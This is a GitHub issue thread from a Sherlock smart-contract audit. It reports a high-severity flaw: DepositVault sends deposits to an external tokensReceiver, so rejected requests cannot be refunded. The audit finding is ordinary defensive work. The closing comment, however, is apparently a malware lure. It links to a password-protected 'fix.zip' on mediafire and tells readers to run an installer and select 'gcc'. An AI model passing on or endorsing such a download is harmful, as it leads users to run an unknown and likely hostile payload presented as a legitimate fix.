### ISSUE TITLE
KiroBrejka - Return the users money, when rejecting request in `DepositVault`

### ISSUE THREAD

**Issue by sherlock-admin2** [sherlock-audit/2024-08-midas-minter-redeemer-judging#78]
KiroBrejka

High

# Return the users money, when rejecting request in `DepositVault`

## Summary
As of right now there is no existing way of returning the money to a user who made a request and his request got rejected 
## Vulnerability Detail
When making request in the `RedemptionVault` you transfer your `mToken` to the vault, and if your request is rejected the admin can send the tokens back to you via `ManageableVault::withdrawToken()` function. This is not the case in `DepositVault`, since the tokens are transferred to an external address named `tokensReceiver`. By doing this transfer, if the user's request is rejected, his tokens are lost forever since the `tokensReceiver` address doesn't have an approval to the `DepositVault` and because of this the `DepositVault` can't transfer the tokens back.
## Impact
There is no way of returning the tokens from the rejected requests to the users, meaning that if a request is rejected a user will essentially get robbed.
## Code Snippet
https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/DepositVault.sol#L243-L255

https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/DepositVault.sol#L148-L214
## Tool used

Manual Review

## Recommendation
either give an approval from the `tokensReceiver` address to the `DepositVault`, and transfer the tokens back to the user in the `rejectRequest()` function, or just ignore the `tokensReceiver` address and transfer the tokens directly into the `DepositVault`. This way you will be able to return the tokens back to the user and if `tokensReceiver` address is some important external protocol which can't be bypassed just like that, you can create another function to transfer the tokens to it or just use the `ManageableVault::WithdrawTo()` function.

Duplicate of #84

**Comment by yldzmuhammed** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
